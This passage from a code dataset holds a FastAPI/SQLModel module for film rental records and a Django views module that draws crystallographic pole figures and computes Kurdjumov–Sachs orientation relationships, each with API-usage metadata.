"call"}, {"api_name": "numpy.random", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.union1d", "line_number": 160, "usage_type": "call"}, {"api_name": "grblas.Vector.from_values", "line_number": 161, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 161, "usage_type": "call"}, {"api_name": "types.GrblasNodeSet", "line_number": 162, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 145, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 148, "usage_type": "name"}]} +{"seq_id": "42543221339", "text": "from typing import List\n\nfrom fastapi import APIRouter\nfrom sqlmodel import select\n\nfrom databases.db import get_db_session\nfrom graphql_app.schemas.rents import RentReadType, RentCreateType\nfrom models.films_and_rents import Rent\n\nrouter = APIRouter()\n\nsession = get_db_session()\n\n\n# Rent Related Routes\ndef get_all_rents() -> List[RentReadType]:\n session.rollback()\n statement = select(Rent)\n results = session.exec(statement).all()\n\n results_strawberry = [RentReadType.from_pydantic(rent)\n for rent in results]\n\n return results_strawberry\n\n\ndef get_by_id_a_rent(rent_id: int) -> RentReadType:\n session.rollback()\n statement = select(Rent).where(Rent.id == rent_id)\n result = session.exec(statement).first()\n\n if result is None:\n raise 
Exception(\"Resource Not Found\")\n\n return RentReadType.from_pydantic(result)\n\n\ndef create_a_rent(rent_create_type: RentCreateType) -> RentReadType:\n session.rollback()\n rent = rent_create_type.to_pydantic()\n new_rent = Rent(film_id=rent.film_id,\n client_id=rent.client_id,\n amount=rent.amount,\n start_date=rent.start_date,\n return_date=rent.return_date,\n actual_return_date=rent.actual_return_date,\n state=rent.state,\n cost=Rent.get_cost(rent))\n\n session.add(new_rent)\n\n session.commit()\n\n return RentReadType.from_pydantic(new_rent)\n\n\ndef update_a_rent(\n rent_id: int, rent_create_type: RentCreateType) -> RentReadType:\n session.rollback()\n rent = rent_create_type.to_pydantic()\n\n statement = select(Rent).where(Rent.id == rent_id)\n\n result = session.exec(statement).first()\n\n if result is None:\n raise Exception(\"Resource Not Found\")\n\n result.film_id = rent.film_id\n result.client_id = rent.client_id\n result.amount = rent.amount\n result.start_date = rent.start_date\n result.return_date = rent.return_date\n result.actual_return_date = rent.actual_return_date\n result.state = rent.state\n result.cost = Rent.get_cost(rent)\n\n session.commit()\n\n return RentReadType.from_pydantic(result)\n\n\ndef delete_a_rent(rent_id: int) -> RentReadType:\n session.rollback()\n statement = select(Rent).where(Rent.id == rent_id)\n\n result = session.exec(statement).one_or_none()\n\n if result is None:\n raise Exception(\"Resource Not Found\")\n\n session.delete(result)\n session.commit()\n\n return RentReadType.from_pydantic(result)\n", "repo_name": "Thevic16/trainee-python-week-10", "sub_path": "resolvers/rents.py", "file_name": "rents.py", "file_ext": "py", "file_size_in_byte": 2542, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "fastapi.APIRouter", "line_number": 10, "usage_type": "call"}, {"api_name": "databases.db.get_db_session", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlmodel.select", "line_number": 18, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 18, "usage_type": "argument"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 21, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 16, "usage_type": "name"}, {"api_name": "sqlmodel.select", "line_number": 29, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 29, "usage_type": "argument"}, {"api_name": "models.films_and_rents.Rent.id", "line_number": 29, "usage_type": "attribute"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 35, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 35, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 27, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentCreateType", "line_number": 38, "usage_type": "name"}, {"api_name": "models.films_and_rents.Rent", "line_number": 41, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent.get_cost", "line_number": 48, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 48, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", 
"line_number": 54, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 54, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 38, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentCreateType", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlmodel.select", "line_number": 62, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 62, "usage_type": "argument"}, {"api_name": "models.films_and_rents.Rent.id", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.films_and_rents.Rent.get_cost", "line_number": 76, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 76, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 80, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 80, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlmodel.select", "line_number": 85, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 85, "usage_type": "argument"}, {"api_name": "models.films_and_rents.Rent.id", "line_number": 85, "usage_type": "attribute"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 95, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 95, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "11346723524", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom . import forms\nimport io\nimport os\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nimport matplotlib.pyplot as plt\nfrom . import function_pole\nfrom . import function_3d\nfrom . import function_ks\nfrom . 
import function_ipf\n\nnd = None\nrd = None\nnd1 = None\nrd1 = None\nnd2 = None\nrd2 = None\nnd_dir = None\nrd_dir = None\nphi_dir = None\ntheta_dir = None\nrot_dir = None\ngraph_dir = None\nnd_pla = None\nrd_pla = None\nrot_pla = None\ngraph_pla = None\ndf_xyz = None\n\n\n# Convert to PNG image format\ndef plt2png():\n    buf = io.BytesIO()\n    plt.savefig(buf, format='png', dpi=200)\n    s = buf.getvalue()\n    buf.close()\n    return s\n\n\n# Create your views here.\ndef menu(request):\n    return render(request, 'analysis/menu.html')\n\n\ndef pole_ebsd(request):\n    global nd\n    global rd\n    f1 = forms.NdForm()\n    f2 = forms.RdForm()\n    nd_h = request.POST.get('nd_h', 0)\n    nd_k = request.POST.get('nd_k', 0)\n    nd_l = request.POST.get('nd_l', 1)\n    rd_h = request.POST.get('rd_h', 0)\n    rd_k = request.POST.get('rd_k', -1)\n    rd_l = request.POST.get('rd_l', 0)\n    nd_pre = [nd_h, nd_k, nd_l]\n    rd_pre = [rd_h, rd_k, rd_l]\n    nd = [float(s) for s in nd_pre]\n    rd = [float(s) for s in rd_pre]\n    dic = {'nd_form': f1,\n           'rd_form': f2,\n           'nd': nd,\n           'rd': rd,\n           }\n    return render(request, 'analysis/pole_ebsd.html', dic)\n\n\ndef img_pole_ebsd(request):\n    global nd\n    global rd\n    plt.clf()\n    co_list = [[1, 0, 0], [1, 1, 0], [1, 1, 1]]\n    aa, a_inverse = function_pole.crystal_matrix(nd, rd)\n    co = function_pole.generate_co(co_list)\n    co_norm = function_pole.co_norm(co)\n    co_convert = function_pole.convert_inverse(co_norm, a_inverse)\n    r_theta = function_pole.xyz2polar(co_convert)\n    ax = function_pole.set_polar_axis()\n    function_pole.polar_plot(r_theta, ax, \"black\")\n    png = plt2png()\n    plt.cla()\n    response = HttpResponse(png, content_type='image/png')\n    return response\n\n\ndef pole_overplot(request):\n    global nd1\n    global rd1\n    global nd2\n    global rd2\n    f11 = forms.NdForm1()\n    f12 = forms.RdForm1()\n    f21 = forms.NdForm2()\n    f22 = forms.RdForm2()\n    nd_h1 = request.POST.get('nd_h1', 0)\n    nd_k1 = request.POST.get('nd_k1', 0)\n    nd_l1 = request.POST.get('nd_l1', 1)\n    rd_h1 = request.POST.get('rd_h1', 0)\n    rd_k1 = request.POST.get('rd_k1', -1)\n    rd_l1 = request.POST.get('rd_l1', 0)\n    nd_h2 = request.POST.get('nd_h2', 1)\n    nd_k2 = request.POST.get('nd_k2', 2)\n    nd_l2 = request.POST.get('nd_l2', 1)\n    rd_h2 = request.POST.get('rd_h2', -1)\n    rd_k2 = request.POST.get('rd_k2', 0)\n    rd_l2 = request.POST.get('rd_l2', 1)\n    nd_pre1 = [nd_h1, nd_k1, nd_l1]\n    rd_pre1 = [rd_h1, rd_k1, rd_l1]\n    nd_pre2 = [nd_h2, nd_k2, nd_l2]\n    rd_pre2 = [rd_h2, rd_k2, rd_l2]\n    nd1 = [float(s) for s in nd_pre1]\n    rd1 = [float(s) for s in rd_pre1]\n    nd2 = [float(s) for s in nd_pre2]\n    rd2 = [float(s) for s in rd_pre2]\n    dic = {'nd_form1': f11,\n           'rd_form1': f12,\n           'nd_form2': f21,\n           'rd_form2': f22,\n           'nd1': nd1,\n           'rd1': rd1,\n           'nd2': nd2,\n           'rd2': rd2,\n           }\n    return render(request, 'analysis/pole_overplot.html', dic)\n\n\ndef img_pole_overplot(request):\n    global nd1\n    global rd1\n    global nd2\n    global rd2\n    plt.clf()\n    co_list = [[1, 0, 0], [1, 1, 0], [1, 1, 1]]\n    aa1, a_inverse1 = function_pole.crystal_matrix(nd1, rd1)\n    aa2, a_inverse2 = function_pole.crystal_matrix(nd2, rd2)\n    co = function_pole.generate_co(co_list)\n    co_norm = function_pole.co_norm(co)\n    co_convert1 = function_pole.convert_inverse(co_norm, a_inverse1)\n    co_convert2 = function_pole.convert_inverse(co_norm, a_inverse2)\n    r_theta1 = function_pole.xyz2polar(co_convert1)\n    r_theta2 = function_pole.xyz2polar(co_convert2)\n    ax = function_pole.set_polar_axis()\n    function_pole.polar_plot(r_theta1, ax, \"red\")\n    function_pole.polar_plot(r_theta2, ax, \"blue\")\n    png = plt2png()\n    plt.cla()\n    response = HttpResponse(png, 
content_type='image/png')\n return response\n\n\ndef direction_analysis(request):\n global nd_dir\n global rd_dir\n global phi_dir\n global theta_dir\n global rot_dir\n global graph_dir\n f1_d = forms.NdForm()\n f2_d = forms.RdForm()\n f_p = forms.PhiForm()\n f_t = forms.ThetaForm()\n f_r = forms.RotationForm()\n nd_h = request.POST.get('nd_h', 0)\n nd_k = request.POST.get('nd_k', 0)\n nd_l = request.POST.get('nd_l', 1)\n rd_h = request.POST.get('rd_h', 0)\n rd_k = request.POST.get('rd_k', -1)\n rd_l = request.POST.get('rd_l', 0)\n phi = request.POST.get('phi', 45)\n theta = request.POST.get('theta', 45)\n rot = request.POST.get('rot', 90)\n graph_dir = request.POST.get('graph_type', 'pf')\n if graph_dir == 'pf':\n graph_type = 'Pole figure'\n elif graph_dir == 'ipf':\n graph_type = 'Inverse pole figure'\n else:\n graph_type = 'Pole figure'\n nd_pre = [nd_h, nd_k, nd_l]\n rd_pre = [rd_h, rd_k, rd_l]\n nd_dir = [float(s) for s in nd_pre]\n rd_dir = [float(s) for s in rd_pre]\n phi_dir = float(phi)\n theta_dir = float(theta)\n rot_dir = float(rot)\n dic = {'nd_form': f1_d,\n 'rd_form': f2_d,\n 'phi_form': f_p,\n 'theta_form': f_t,\n 'rot_form': f_r,\n 'nd': nd_dir,\n 'rd': rd_dir,\n 'phi': phi_dir,\n 'theta': theta_dir,\n 'rot': rot_dir,\n 'graph_type': graph_type,\n }\n return render(request, 'analysis/direction.html', dic)\n\n\ndef img_direction(request):\n global nd_dir\n global rd_dir\n global phi_dir\n global theta_dir\n global rot_dir\n global graph_dir\n plt.clf()\n phi_theta = [0, phi_dir, theta_dir]\n co_list = [[0, 0, 1], [0, 1, 1], [1, 1, 1], [1, 1, 2], [1, 2, 5], [1, 1, 3]]\n df_dir = pd.DataFrame(np.array([phi_theta]))\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n r_theta = function_pole.xyz2polar(co_norm)\n if graph_dir == 'pf':\n a = function_3d.crystal_matrix_rot(nd_dir, rd_dir, rot_dir)\n xyz = function_3d.phi_theta2xyz(df_dir)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n df_polar = function_3d.convert_stereo(cry_use)\n ax = function_pole.set_polar_axis()\n function_pole.zone_ax_plot(ax)\n function_pole.polar_plot(r_theta, ax, \"black\")\n function_3d.pol_plot(df_polar, ax, \"red\")\n elif graph_dir == 'ipf':\n a = function_3d.crystal_matrix_rot(nd_dir, rd_dir, rot_dir)\n xyz = function_3d.phi_theta2xyz(df_dir)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n cry_ipf = function_ipf.change_ipf(cry_use)\n df_polar = function_3d.convert_stereo(cry_ipf)\n frame_101 = np.zeros((0, 3))\n for i in range(-10, 10):\n for s in range(-10, 10):\n x = i\n y = s\n z = i\n part = [x, y, z]\n frame_ = np.array(part)\n frame_101 = np.vstack((frame_101, frame_))\n frame_101_k = function_ipf.change_ipf(frame_101)\n frame_bottom = np.array([[1, 0, 1]])\n frame_upper = np.array([[1, 1, 1]])\n ax = function_ipf.axis_ipf2()\n pol_101 = function_ipf.co2polar(frame_101_k)\n pol_bottom = function_ipf.co2polar(frame_bottom)\n pol_bottom.loc[\"add\"] = [0, 0, 0]\n pol_upper = function_ipf.co2polar(frame_upper)\n pol_upper.loc[\"add\"] = [0, 0, 0]\n function_ipf.polar_line(ax, pol_101)\n function_ipf.polar_line(ax, pol_bottom)\n function_ipf.polar_line(ax, pol_upper)\n function_ipf.polar_plot_k(r_theta, ax, \"black\")\n function_ipf.pol_plot(df_polar, ax, \"red\")\n png = plt2png()\n plt.cla()\n response = HttpResponse(png, content_type='image/png')\n return response\n\n\ndef plane_analysis(request):\n global nd_pla\n global rd_pla\n global rot_pla\n global graph_pla\n global df_xyz\n f1_d = 
forms.NdForm()\n f2_d = forms.RdForm()\n f_r = forms.RotationForm()\n nd_h = request.POST.get('nd_h', 0)\n nd_k = request.POST.get('nd_k', 0)\n nd_l = request.POST.get('nd_l', 1)\n rd_h = request.POST.get('rd_h', 0)\n rd_k = request.POST.get('rd_k', -1)\n rd_l = request.POST.get('rd_l', 0)\n rot = request.POST.get('rot', 90)\n graph_pla = request.POST.get('graph_type', 'pf')\n if graph_pla == 'pf':\n graph_type = 'Pole figure'\n elif graph_pla == 'ipf':\n graph_type = 'Inverse pole figure'\n else:\n graph_type = 'Pole figure'\n nd_pre = [nd_h, nd_k, nd_l]\n rd_pre = [rd_h, rd_k, rd_l]\n nd_pla = [float(s) for s in nd_pre]\n rd_pla = [float(s) for s in rd_pre]\n rot_pla = float(rot)\n if request.method == 'POST':\n df_xyz = None\n name = request.FILES['file'].name\n ext = os.path.splitext(name)\n if ext[1] == \".csv\":\n me = io.TextIOWrapper(request.FILES['file'].file, encoding='utf-8')\n df_xyz = pd.read_csv(me, header=None)\n else:\n pass\n else:\n name = None\n dic = {'nd_form': f1_d,\n 'rd_form': f2_d,\n 'rot_form': f_r,\n 'nd': nd_pla,\n 'rd': rd_pla,\n 'rot': rot_pla,\n 'file_name': name,\n 'graph_type': graph_type,\n }\n return render(request, 'analysis/plane.html', dic)\n\n\ndef img_plane(request):\n global nd_pla\n global rd_pla\n global rot_pla\n global graph_pla\n global df_xyz\n if df_xyz is None:\n response = HttpResponse('')\n else:\n plt.clf()\n co_list = [[0, 0, 1], [0, 1, 1], [1, 1, 1], [1, 1, 2], [1, 2, 5], [1, 1, 3]]\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n r_theta = function_pole.xyz2polar(co_norm)\n if graph_pla == 'pf':\n a = function_3d.crystal_matrix_rot(nd_pla, rd_pla, rot_pla)\n xyz = np.array(df_xyz)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n df_polar = function_3d.convert_stereo(cry_use)\n df_r_theta = df_polar.drop(\"theta_rad\", axis=1)\n df_hist = function_3d.create_hist(df_r_theta)\n ax = function_pole.set_polar_axis()\n function_3d.plot_hist(df_hist, ax)\n function_pole.zone_ax_plot(ax)\n function_pole.polar_plot(r_theta, ax, \"black\")\n elif graph_pla == 'ipf':\n frame_101 = np.zeros((0, 3))\n for i in range(-15, 15):\n for s in range(-15, 15):\n x = i\n y = s\n z = i\n part = [x, y, z]\n frame_ = np.array(part)\n frame_101 = np.vstack((frame_101, frame_))\n frame_bottom = np.array([[1, 0, 1]])\n frame_upper = np.array([[1, 1, 1]])\n a = function_3d.crystal_matrix_rot(nd_pla, rd_pla, rot_pla)\n xyz = np.array(df_xyz)\n cry = function_3d.xyz2co(xyz, a)\n cry_use = function_3d.south2north(cry)\n cry_ipf = function_ipf.change_ipf(cry_use)\n df_polar = function_3d.convert_stereo(cry_ipf)\n df_r_theta = df_polar.drop(\"theta_rad\", axis=1)\n df_hist = function_3d.create_hist(df_r_theta)\n ax = function_ipf.axis_ipf()\n pol_101 = function_ipf.co2polar(frame_101)\n pol_bottom = function_ipf.co2polar(frame_bottom)\n pol_bottom.loc[\"add\"] = [0, 0, 0]\n pol_upper = function_ipf.co2polar(frame_upper)\n pol_upper.loc[\"add\"] = [0, 0, 0]\n function_ipf.polar_line(ax, pol_101)\n function_ipf.polar_line(ax, pol_bottom)\n function_ipf.polar_line(ax, pol_upper)\n co = function_pole.generate_co(co_list)\n co_norm = function_pole.co_norm(co)\n r_theta = function_pole.xyz2polar(co_norm)\n xx = np.ones(len(pol_101))\n yy = pd.DataFrame(xx.T)\n zz = pol_101.join(yy)\n function_ipf.plot_hist_k(df_hist, ax)\n function_ipf.polar_plot_k(r_theta, ax, \"black\")\n ax.fill_between(zz.iloc[:, 2], zz.iloc[:, 0], zz.iloc[:, 3], facecolors=\"white\")\n png = plt2png()\n plt.cla()\n response = HttpResponse(png, 
content_type='image/png')\n return response\n\n\ndef ks_one(request):\n f11 = forms.NdForm1()\n f12 = forms.RdForm1()\n f21 = forms.NdForm2()\n f22 = forms.RdForm2()\n p1 = forms.PlaneForm1()\n p2 = forms.PlaneForm2()\n d1 = forms.DirectionForm1()\n d2 = forms.DirectionForm2()\n nd_h1 = request.POST.get('nd_h1', -2)\n nd_k1 = request.POST.get('nd_k1', 1)\n nd_l1 = request.POST.get('nd_l1', 2)\n rd_h1 = request.POST.get('rd_h1', 1.5)\n rd_k1 = request.POST.get('rd_k1', -1)\n rd_l1 = request.POST.get('rd_l1', 0)\n nd_h2 = request.POST.get('nd_h2', 1.5)\n nd_k2 = request.POST.get('nd_k2', 0)\n nd_l2 = request.POST.get('nd_l2', 1)\n rd_h2 = request.POST.get('rd_h2', 1)\n rd_k2 = request.POST.get('rd_k2', 1)\n rd_l2 = request.POST.get('rd_l2', -1)\n p1_h = request.POST.get('p1_h', -1)\n p1_k = request.POST.get('p1_k', -1)\n p1_l = request.POST.get('p1_l', 1)\n p2_h = request.POST.get('p2_h', 1)\n p2_k = request.POST.get('p2_k', -1)\n p2_l = request.POST.get('p2_l', 0)\n d1_h = request.POST.get('d1_h', -1)\n d1_k = request.POST.get('d1_k', 1)\n d1_l = request.POST.get('d1_l', 0)\n d2_h = request.POST.get('d2_h', -1)\n d2_k = request.POST.get('d2_k', -1)\n d2_l = request.POST.get('d2_l', 1)\n nd_pre1 = [nd_h1, nd_k1, nd_l1]\n rd_pre1 = [rd_h1, rd_k1, rd_l1]\n nd_pre2 = [nd_h2, nd_k2, nd_l2]\n rd_pre2 = [rd_h2, rd_k2, rd_l2]\n p1_pre = [p1_h, p1_k, p1_l]\n p2_pre = [p2_h, p2_k, p2_l]\n d1_pre = [d1_h, d1_k, d1_l]\n d2_pre = [d2_h, d2_k, d2_l]\n nd_fcc = [float(s) for s in nd_pre1]\n rd_fcc = [float(s) for s in rd_pre1]\n nd_bcc = [float(s) for s in nd_pre2]\n rd_bcc = [float(s) for s in rd_pre2]\n p_fcc = [float(s) for s in p1_pre]\n p_bcc = [float(s) for s in p2_pre]\n d_fcc = [float(s) for s in d1_pre]\n d_bcc = [float(s) for s in d2_pre]\n x_ = p_fcc / np.linalg.norm(p_fcc)\n y_ = p_bcc / np.linalg.norm(p_bcc)\n xx_ = d_fcc / np.linalg.norm(d_fcc)\n yy_ = d_bcc / np.linalg.norm(d_bcc)\n comb_list = p_fcc + d_fcc + p_bcc + d_bcc\n norm_list = list(x_) + list(xx_) + list(y_) + list(yy_)\n comb_array = np.array([comb_list])\n norm_array = np.array([norm_list])\n result = function_ks.calc_ks(nd_fcc, rd_fcc, nd_bcc, rd_bcc, comb_array, norm_array)\n dic = {'nd_form1': f11,\n 'rd_form1': f12,\n 'nd_form2': f21,\n 'rd_form2': f22,\n 'p1_form': p1,\n 'p2_form': p2,\n 'd1_form': d1,\n 'd2_form': d2,\n 'nd_fcc': nd_fcc,\n 'rd_fcc': rd_fcc,\n 'nd_bcc': nd_bcc,\n 'rd_bcc': rd_bcc,\n 'p_fcc': p_fcc,\n 'p_bcc': p_bcc,\n 'd_fcc': d_fcc,\n 'd_bcc': d_bcc,\n 'plane': round(result[4], 2),\n 'direction': round(result[5], 2),\n 'ks': round(result[6], 2),\n }\n return render(request, 'analysis/ks_one.html', dic)\n\n\ndef ks_all(request):\n f11 = forms.NdForm1()\n f12 = forms.RdForm1()\n f21 = forms.NdForm2()\n f22 = forms.RdForm2()\n nd_h1 = request.POST.get('nd_h1', -2)\n nd_k1 = request.POST.get('nd_k1', 1)\n nd_l1 = request.POST.get('nd_l1', 2)\n rd_h1 = request.POST.get('rd_h1', 1.5)\n rd_k1 = request.POST.get('rd_k1', -1)\n rd_l1 = request.POST.get('rd_l1', 0)\n nd_h2 = request.POST.get('nd_h2', 1.5)\n nd_k2 = request.POST.get('nd_k2', 0)\n nd_l2 = request.POST.get('nd_l2', 1)\n rd_h2 = request.POST.get('rd_h2', 1)\n rd_k2 = request.POST.get('rd_k2', 1)\n rd_l2 = request.POST.get('rd_l2', -1)\n nd_pre1 = [nd_h1, nd_k1, nd_l1]\n rd_pre1 = [rd_h1, rd_k1, rd_l1]\n nd_pre2 = [nd_h2, nd_k2, nd_l2]\n rd_pre2 = [rd_h2, rd_k2, rd_l2]\n nd_fcc = [float(s) for s in nd_pre1]\n rd_fcc = [float(s) for s in rd_pre1]\n nd_bcc = [float(s) for s in nd_pre2]\n rd_bcc = [float(s) for s in rd_pre2]\n # 
===============================================================================\n # preparation of possible combination of plane and direction\n # K-S OR\n # (111)fcc//(011)bcc\n # [0-11]fcc//[1-11]bcc\n # ===============================================================================\n x1 = [[1, 1, 1], [-1, -1, -1]]\n y1 = [[0, 1, -1], [0, -1, 1], [1, 0, -1], [-1, 0, 1], [1, -1, 0], [-1, 1, 0]]\n x2 = [[1, -1, 1], [-1, 1, -1]]\n y2 = [[0, 1, 1], [0, -1, -1], [1, 0, -1], [-1, 0, 1], [1, 1, 0], [-1, -1, 0]]\n x3 = [[1, 1, -1], [-1, -1, 1]]\n y3 = [[0, 1, 1], [0, -1, -1], [1, 0, 1], [-1, 0, -1], [1, -1, 0], [-1, 1, 0]]\n x4 = [[-1, 1, 1], [1, -1, -1]]\n y4 = [[0, 1, -1], [0, -1, 1], [1, 0, 1], [-1, 0, -1], [1, 1, 0], [-1, -1, 0]]\n\n a1 = [[0, 1, 1], [0, -1, -1]]\n b1 = [[1, 1, -1], [-1, 1, -1], [1, -1, 1], [-1, -1, 1]]\n a2 = [[1, 0, 1], [-1, 0, -1]]\n b2 = [[1, 1, -1], [1, -1, -1], [-1, 1, 1], [-1, -1, 1]]\n a3 = [[1, 1, 0], [-1, -1, 0]]\n b3 = [[1, -1, 1], [1, -1, -1], [-1, 1, 1], [-1, 1, -1]]\n a4 = [[0, 1, -1], [0, -1, 1]]\n b4 = [[1, 1, 1], [-1, 1, 1], [1, -1, -1], [-1, -1, -1]]\n a5 = [[1, 0, -1], [-1, 0, 1]]\n b5 = [[1, 1, 1], [1, -1, 1], [-1, 1, -1], [-1, -1, -1]]\n a6 = [[1, -1, 0], [-1, 1, 0]]\n b6 = [[1, 1, 1], [1, 1, -1], [-1, -1, 1], [-1, -1, -1]]\n fcc_comb = []\n fcc_norm = []\n for s, t in zip([x1, x2, x3, x4], [y1, y2, y3, y4]):\n for v, w in itertools.product(s, t):\n z = list(v) + list(w)\n zz = list(list(v) / np.linalg.norm(list(v))) + list(list(w) / np.linalg.norm(list(w)))\n fcc_comb.append(z)\n fcc_norm.append(zz)\n bcc_comb = []\n bcc_norm = []\n for s, t in zip([a1, a2, a3, a4, a5, a6], [b1, b2, b3, b4, b5, b6]):\n for v, w in itertools.product(s, t):\n z = list(v) + list(w)\n zz = list(list(v) / np.linalg.norm(list(v))) + list(list(w) / np.linalg.norm(list(w)))\n bcc_comb.append(z)\n bcc_norm.append(zz)\n total_comb = []\n for v, w in itertools.product(fcc_comb, bcc_comb):\n z = list(v) + list(w)\n total_comb.append(z)\n comb_array = np.array(total_comb)\n norm_comb = []\n for v, w in itertools.product(fcc_norm, bcc_norm):\n z = list(v) + list(w)\n norm_comb.append(z)\n norm_array = np.array(norm_comb)\n result = function_ks.calc_ks(nd_fcc, rd_fcc, nd_bcc, rd_bcc, comb_array, norm_array)\n dic = {'nd_form1': f11,\n 'rd_form1': f12,\n 'nd_form2': f21,\n 'rd_form2': f22,\n 'nd_fcc': nd_fcc,\n 'rd_fcc': rd_fcc,\n 'nd_bcc': nd_bcc,\n 'rd_bcc': rd_bcc,\n 'p_fcc': result[0],\n 'p_bcc': result[2],\n 'd_fcc': result[1],\n 'd_bcc': result[3],\n 'plane': round(result[4], 2),\n 'direction': round(result[5], 2),\n 'ks': round(result[6], 2),\n }\n return render(request, 'analysis/ks_all.html', dic)\n", "repo_name": "yuta1023/analysis_app", "sub_path": "analysis/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 19368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.cla", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 152, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "io.TextIOWrapper", "line_number": 299, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 300, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 314, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": 